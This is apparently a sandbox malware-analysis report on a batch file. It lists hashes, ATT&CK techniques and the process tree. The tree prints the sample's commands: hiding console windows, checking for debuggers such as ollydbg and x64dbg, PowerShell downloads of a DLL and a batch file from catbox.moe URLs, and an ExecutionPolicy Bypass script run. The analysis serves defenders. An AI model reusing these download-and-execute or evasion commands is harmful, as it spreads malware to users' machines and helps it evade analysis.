87913ff2c6fabe85812bbc7691a8773cb4842557699151d63fe492f2420fc567

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02/03/2025, 19:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wB30XU8F.bat
Size

12KB
MD5

9db325d6143da09edc4e1fe41b152e71
SHA1

cfc1af0130d50fb88d173ebcecaa3f0b16e1f1d4
SHA256

87913ff2c6fabe85812bbc7691a8773cb4842557699151d63fe492f2420fc567
SHA512

3a49d024aca27d1044b9874b1726354a4c002965be3b890a74024ae9a6196ec31df4a8854d1c058c70b6ccd98b0a8b127c323ff0e2dd9d714321ddd362bc0001
SSDEEP

384:CKvwJK8ve177XuvkHs8U06Z+a/PXA3P4uxc7Q7/WlAnY1e++ptdy:TwU1nXFs8UF+aQuQYOceZjy

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1776	powershell.exe
2896	powershell.exe
928	powershell.exe

Enumerates processes with tasklist 1 TTPs 13 IoCs

discovery

Process Discovery

T1057

pid	Process
2796	tasklist.exe
2576	tasklist.exe
2560	tasklist.exe
1424	tasklist.exe
1232	tasklist.exe
2016	tasklist.exe
2848	tasklist.exe
2916	tasklist.exe
2804	tasklist.exe
3044	tasklist.exe
2920	tasklist.exe
2936	tasklist.exe
2928	tasklist.exe

Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

Command interpreters often include specific commands/flags that ignore errors and other hangups.

defense_evasion

Ignore Process Interrupts

T1564.011

pid	Process
2332	powershell.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2748	sc.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2332	powershell.exe
2332	powershell.exe
1776	powershell.exe
2896	powershell.exe
928	powershell.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2796	tasklist.exe
Token: SeDebugPrivilege	2576	tasklist.exe
Token: SeDebugPrivilege	2804	tasklist.exe
Token: SeDebugPrivilege	2560	tasklist.exe
Token: SeDebugPrivilege	3044	tasklist.exe
Token: SeDebugPrivilege	1424	tasklist.exe
Token: SeDebugPrivilege	1232	tasklist.exe
Token: SeDebugPrivilege	2016	tasklist.exe
Token: SeDebugPrivilege	2848	tasklist.exe
Token: SeDebugPrivilege	2920	tasklist.exe
Token: SeDebugPrivilege	2936	tasklist.exe
Token: SeDebugPrivilege	2928	tasklist.exe
Token: SeDebugPrivilege	2916	tasklist.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 2332	2276	cmd.exe	32
PID 2276 wrote to memory of 2332	2276	cmd.exe	32
PID 2276 wrote to memory of 2332	2276	cmd.exe	32
PID 2332 wrote to memory of 2084	2332	powershell.exe	33
PID 2332 wrote to memory of 2084	2332	powershell.exe	33
PID 2332 wrote to memory of 2084	2332	powershell.exe	33
PID 2084 wrote to memory of 2428	2084	csc.exe	34
PID 2084 wrote to memory of 2428	2084	csc.exe	34
PID 2084 wrote to memory of 2428	2084	csc.exe	34
PID 2276 wrote to memory of 2748	2276	cmd.exe	35
PID 2276 wrote to memory of 2748	2276	cmd.exe	35
PID 2276 wrote to memory of 2748	2276	cmd.exe	35
PID 2276 wrote to memory of 2796	2276	cmd.exe	36
PID 2276 wrote to memory of 2796	2276	cmd.exe	36
PID 2276 wrote to memory of 2796	2276	cmd.exe	36
PID 2276 wrote to memory of 2972	2276	cmd.exe	37
PID 2276 wrote to memory of 2972	2276	cmd.exe	37
PID 2276 wrote to memory of 2972	2276	cmd.exe	37
PID 2276 wrote to memory of 2692	2276	cmd.exe	38
PID 2276 wrote to memory of 2692	2276	cmd.exe	38
PID 2276 wrote to memory of 2692	2276	cmd.exe	38
PID 2276 wrote to memory of 2576	2276	cmd.exe	40
PID 2276 wrote to memory of 2576	2276	cmd.exe	40
PID 2276 wrote to memory of 2576	2276	cmd.exe	40
PID 2276 wrote to memory of 2900	2276	cmd.exe	41
PID 2276 wrote to memory of 2900	2276	cmd.exe	41
PID 2276 wrote to memory of 2900	2276	cmd.exe	41
PID 2276 wrote to memory of 3032	2276	cmd.exe	42
PID 2276 wrote to memory of 3032	2276	cmd.exe	42
PID 2276 wrote to memory of 3032	2276	cmd.exe	42
PID 2276 wrote to memory of 2804	2276	cmd.exe	43
PID 2276 wrote to memory of 2804	2276	cmd.exe	43
PID 2276 wrote to memory of 2804	2276	cmd.exe	43
PID 2276 wrote to memory of 2596	2276	cmd.exe	44
PID 2276 wrote to memory of 2596	2276	cmd.exe	44
PID 2276 wrote to memory of 2596	2276	cmd.exe	44
PID 2276 wrote to memory of 2824	2276	cmd.exe	45
PID 2276 wrote to memory of 2824	2276	cmd.exe	45
PID 2276 wrote to memory of 2824	2276	cmd.exe	45
PID 2276 wrote to memory of 2560	2276	cmd.exe	46
PID 2276 wrote to memory of 2560	2276	cmd.exe	46
PID 2276 wrote to memory of 2560	2276	cmd.exe	46
PID 2276 wrote to memory of 2592	2276	cmd.exe	47
PID 2276 wrote to memory of 2592	2276	cmd.exe	47
PID 2276 wrote to memory of 2592	2276	cmd.exe	47
PID 2276 wrote to memory of 2616	2276	cmd.exe	48
PID 2276 wrote to memory of 2616	2276	cmd.exe	48
PID 2276 wrote to memory of 2616	2276	cmd.exe	48
PID 2276 wrote to memory of 3044	2276	cmd.exe	49
PID 2276 wrote to memory of 3044	2276	cmd.exe	49
PID 2276 wrote to memory of 3044	2276	cmd.exe	49
PID 2276 wrote to memory of 2584	2276	cmd.exe	50
PID 2276 wrote to memory of 2584	2276	cmd.exe	50
PID 2276 wrote to memory of 2584	2276	cmd.exe	50
PID 2276 wrote to memory of 3064	2276	cmd.exe	51
PID 2276 wrote to memory of 3064	2276	cmd.exe	51
PID 2276 wrote to memory of 3064	2276	cmd.exe	51
PID 2276 wrote to memory of 1424	2276	cmd.exe	52
PID 2276 wrote to memory of 1424	2276	cmd.exe	52
PID 2276 wrote to memory of 1424	2276	cmd.exe	52
PID 2276 wrote to memory of 2724	2276	cmd.exe	53
PID 2276 wrote to memory of 2724	2276	cmd.exe	53
PID 2276 wrote to memory of 2724	2276	cmd.exe	53
PID 2276 wrote to memory of 2436	2276	cmd.exe	54

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\wB30XU8F.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$processes = Get-Process cmd -ErrorAction SilentlyContinue; foreach ($process in $processes) { $hwnd = $process.MainWindowHandle; if ($hwnd -ne 0) { Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class WindowUtils { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); }'; [WindowUtils]::ShowWindow($hwnd, 0) } }"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2332
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\njiltmkj.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE235.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE234.tmp"
      4⤵
      PID:2428
- C:\Windows\system32\sc.exe
  sc query "aga"
  2⤵
  - Launches sc.exe
  PID:2748
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\system32\findstr.exe
  findstr "ollydbg"
  2⤵
  PID:2972
- C:\Windows\system32\find.exe
  find /I "ollydbg"
  2⤵
  PID:2692
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2576
- C:\Windows\system32\findstr.exe
  findstr "immunity"
  2⤵
  PID:2900
- C:\Windows\system32\find.exe
  find /I "immunity"
  2⤵
  PID:3032
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2804
- C:\Windows\system32\findstr.exe
  findstr "x64dbg"
  2⤵
  PID:2596
- C:\Windows\system32\find.exe
  find /I "x64dbg"
  2⤵
  PID:2824
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2560
- C:\Windows\system32\findstr.exe
  findstr "windbg"
  2⤵
  PID:2592
- C:\Windows\system32\find.exe
  find /I "windbg"
  2⤵
  PID:2616
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\system32\findstr.exe
  findstr "ida"
  2⤵
  PID:2584
- C:\Windows\system32\find.exe
  find /I "ida"
  2⤵
  PID:3064
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- C:\Windows\system32\findstr.exe
  findstr "dbgview"
  2⤵
  PID:2724
- C:\Windows\system32\find.exe
  find /I "dbgview"
  2⤵
  PID:2436
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:1232
- C:\Windows\system32\findstr.exe
  findstr "cdb"
  2⤵
  PID:1360
- C:\Windows\system32\find.exe
  find /I "cdb"
  2⤵
  PID:2352
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Windows\system32\findstr.exe
  findstr "cheatengine"
  2⤵
  PID:1908
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2848
- C:\Windows\system32\findstr.exe
  findstr "apimon"
  2⤵
  PID:1524
- C:\Windows\system32\find.exe
  find /I "apimon"
  2⤵
  PID:348
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2920
- C:\Windows\system32\findstr.exe
  findstr "recview"
  2⤵
  PID:2884
- C:\Windows\system32\find.exe
  find /I "recview"
  2⤵
  PID:2872
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2936
- C:\Windows\system32\findstr.exe
  findstr "softice"
  2⤵
  PID:3056
- C:\Windows\system32\find.exe
  find /I "softice"
  2⤵
  PID:2292
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Windows\system32\findstr.exe
  findstr "sandra"
  2⤵
  PID:2008
- C:\Windows\system32\find.exe
  find /I "sandra"
  2⤵
  PID:2136
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2916
- C:\Windows\system32\findstr.exe
  findstr "w32dasm"
  2⤵
  PID:3036
- C:\Windows\system32\find.exe
  find /I "w32dasm"
  2⤵
  PID:1576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Invoke-Webrequest https://files.catbox.moe/vciwjb.dll -OutFile GetAdmin.dll"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Invoke-Webrequest https://files.catbox.moe/vopazt.bat -OutFile J8PszkJI.bat"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -File "Bypass.ps1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Credential Access

Discovery

Process Discovery

T1057

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Bypass.ps1

Filesize
209B

MD5
e82f17b469d83563a530829d66077387

SHA1
b0fd2c3c95ae8d2789d2e70d0c8f4cfd8a2b4801

SHA256
1146ff2c6a9e54085aee89b29d52c1e2d3933e24a448f3e5151d3b27dc3a800e

SHA512
ed07cea3de0ea1a253783d26b7fa8968a91bbd09dd218f9e914d2a1759fba5da228253d01ffc933238ccf30ddd6f6d21219d8c6a25a7dcb3b832e40fb23cf474

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE235.tmp

Filesize
1KB

MD5
dccac1b35125a8a233c18c575418b31b

SHA1
44819220323cc0d17f13ff5915547e7419ec9c01

SHA256
882886a93e0185bfd9751ca745005058dcfc6507a18f0cf3fd38a5cc486fa6b0

SHA512
2fc44a9a6af9554a5904e7811db9657221734150f150f7e98eefe1eb80b568ccba36f8440858d71ed5f8210247daa7fa8490b38d8088cb26547d4697106bf235

Download Submit
C:\Users\Admin\AppData\Local\Temp\njiltmkj.dll

Filesize
3KB

MD5
377efb9cf3b99768687217544505d7db

SHA1
61ece3dd381494e298d2224206b26a63b9d67f48

SHA256
121e7f34e31eefb931275dd536da6d21b7a65ab38a35bdae7c46fa1f67843785

SHA512
bf7fb4597d857755de8b50c467e640f03e7baf3bf7c55cd766fd6bdfaf990e0385ebd2f169776b4542729cebc76b825311763795bcf023fc7430d92788cafbd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\njiltmkj.pdb

Filesize
7KB

MD5
66db2a414ad655b46e6dd1b8f928c4fb

SHA1
d57408e4fff687f9d627b75e45ae42bcd4511cac

SHA256
2e9988bb1eaf00e1a1d7c57b059436dd0e54098df60d7619157cb417dd54c8e2

SHA512
fa3136c831a6bdd2a9f1826d99aaade98200e1a643ccd046a45ebae4fb3db2be9851d696cfc60202b6dc0bb1a35566592b5144d536db78b094f7f0e70f35c326

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3a101e8b0988f3b81997056034f7479a

SHA1
ae22856f66a1cfdf06429267fd826108e7b74d91

SHA256
7de923c6194274f1e32a11eed13b201fe1d3106c0d9fdad05ea9a6b3f8321e36

SHA512
757d2371bef604dfba585f4d4cd08f2911aa2670b55819c57873b24a7714b3dca5a81b7399bb576b20f68296da308d7ac4be5f2172e9d5c8ed10269ef9b2afac

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCE234.tmp

Filesize
652B

MD5
fd0c4cfb8cdfa784bf999ab495f8449c

SHA1
95a82e6bad3ee840874ab45726583c0dfcf5d46e

SHA256
f43b5ae4410dd200ce180d9368baf23a0146499c75d8d033980a2048d94d3bb2

SHA512
ce5bbf96d5a042a22774bd7033801269fcb5d90d948642da438a246389eba5a123efcca628dda6b2c23df6348bf9e53ec939474398d228886ca335ae69264a8f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\njiltmkj.0.cs

Filesize
174B

MD5
459fed6cac915561d3cbe767262a34c5

SHA1
8b2465fa92c95c0afcff113f93e971fb812a1ef9

SHA256
5809f2d566f13a09f4fa7971698878460c9db4c1650c00d2adf2bfe40c8587ef

SHA512
cf8cda40a2b1f1a1dc5a8e6edf1702d683dac463ac0c09ebd6a4055074a92349747764d59b434779ad6ca9692a00ab2c730c08993d9a832be4fd0cfcd60a5fd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\njiltmkj.cmdline

Filesize
309B

MD5
8e122f05ceef542be4c3f337d4d0d67b

SHA1
c154f4ba51eabe78595337f40135bd778616ac2b

SHA256
15a47f44b832f0b57913d46dc18023958a9acd3a73dbb55cfd7f6fbdc703cb0b

SHA512
eeb26abfb01c5dea0b3df88de0dcefa0ff39a0947d506afefe0fa0636c7bcc51e2c34136745cae6024524e27f61eb25fc6f5eacbc58ebfea81cf8fb748eb52aa

Download Submit
memory/1776-35-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1776-34-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2084-23-0x000007FEF5C80000-0x000007FEF661D000-memory.dmp

Filesize
9.6MB

Download
memory/2084-15-0x000007FEF5C80000-0x000007FEF661D000-memory.dmp

Filesize
9.6MB

Download
memory/2332-9-0x000007FEF5C80000-0x000007FEF661D000-memory.dmp

Filesize
9.6MB

Download
memory/2332-25-0x0000000002A60000-0x0000000002A68000-memory.dmp

Filesize
32KB

Download
memory/2332-4-0x000007FEF5F3E000-0x000007FEF5F3F000-memory.dmp

Filesize
4KB

Download
memory/2332-28-0x000007FEF5C80000-0x000007FEF661D000-memory.dmp

Filesize
9.6MB

Download
memory/2332-8-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2332-5-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2332-6-0x000007FEF5C80000-0x000007FEF661D000-memory.dmp

Filesize
9.6MB

Download
memory/2332-7-0x000007FEF5C80000-0x000007FEF661D000-memory.dmp

Filesize
9.6MB

Download